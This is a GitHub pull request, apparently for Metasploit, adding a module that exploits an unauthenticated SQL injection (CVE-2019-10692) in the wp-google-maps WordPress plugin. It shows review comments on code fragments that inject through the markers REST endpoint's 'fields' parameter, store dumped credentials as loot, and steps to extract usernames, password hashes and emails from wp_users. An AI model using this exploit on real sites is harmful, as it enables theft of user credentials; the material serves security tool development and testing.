Add wp-google-maps unauthenticated SQL injection (CVE-2019-10692) #11698
Conversation
| 'uri' => normalize_uri(target_uri.path, '/wp-json/wpgmza/v1/markers/'), | ||
| 'vars_get' => { | ||
| 'filter' => '{}', | ||
| 'fields' => sql_query, |
There was a problem hiding this comment.
a very slight improvement would be to change this to "#{sql_query}-- -" so you don't need to pass the -- - each time
| end | ||
|
|
||
| unless credentials.empty? | ||
| loot = store_loot("wp_google_maps.http","text/plain", rhost, credentials) |
There was a problem hiding this comment.
This is most likely debatable, but I'd actually personally prefer storing body or even res here and calling it wp_google_maps.json with the appropriate ctype. Only because we have extra data (i believe) in the query that wasn't printed, may as well store it.
| private_type: :nonreplayable_hash, | ||
| status: Metasploit::Model::Login::Status::UNTRIED, | ||
| proof: user['user_email'] | ||
| }.merge(service_details) |
There was a problem hiding this comment.
Doesn't look like service_details was ever define?
|
Thanks for the review @h00die 👍 |
|
PR opened Synacktiv-contrib#2 |
Wp google maps sqli update
Release NotesThe wp_google_maps_sqli auxiliary module exploits a SQL injection in a REST endpoint registered by the WordPress plugin wp-google-maps from v7.11.00 through v7.11.17. |
This auxiliary module aims to exploit an unauthenticated SQL injection in the WordPress module
wp-google-maps(CVE-2019-10692). The code is heavily based onauxiliary/admin/http/wp_symposium_sql_injection, but it may require some final tweaking :-)Verification
wp-google-maps(eg. 7.11.17) and enable itmsfconsoleuse auxiliary/admin/http/wp_google_maps_sql_injectionset RHOST <ip>check: it should say that the target is vulnerablerun: it should show the fieldsuser_login,user_passanduser_emailof the wholewp_userstable